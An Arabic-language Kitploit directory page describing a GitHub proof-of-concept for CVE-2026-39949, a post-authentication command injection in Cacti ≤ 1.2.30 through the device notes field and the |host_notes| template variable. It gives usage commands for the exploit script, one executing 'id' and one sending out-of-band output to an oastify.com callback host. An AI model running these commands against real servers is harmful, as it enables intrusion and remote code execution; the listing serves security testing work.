Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39949 — Cacti ≤ 1.2.30 RCE بعد المصادقة - حقن متغير المضيف | Kitploit
أدوات/GitHubGitHub/lukehebe/cve-2026-39949
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 RCE بعد المصادقة - حقن متغير المضيف

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39949: تنفيذ أكواد عن بُعد بعد المصادقة في Cacti عبر حقن متغير المضيف

الملخص

تسمح ثغرة حقن أوامر نظام التشغيل في Cacti ≤ 1.2.30 لأي مستخدم موثَّق يتمتع بصلاحيات إنشاء الأجهزة وقوالب الرسوم البيانية بتنفيذ أوامر عشوائية على الخادم الأساسي. يكمن الخلل في أن حقول بيانات المضيف الوصفية التي يتحكم فيها المستخدم (وتحديداً حقل ملاحظات الجهاز) تُستبدل في وسائط سطر أوامر RRDtool عبر محرك استبدال المتغيرات في Cacti دون أي تنقية أو تهريب. يمكن للمهاجم حقن محارف وصفية للصدفة في حقل الملاحظات، وصياغة قالب رسم بياني يشير إلى متغير |host_notes|، ثم تحفيز عرض الرسم البياني لتحقيق تنفيذ كامل للأكواد عن بُعد بصلاحيات مستخدم خادم الويب.

الاستخدام:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

تنفيذ الأوامر خارج النطاق (OOB):

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
صورة صورة
صورة
تنزيل الأداة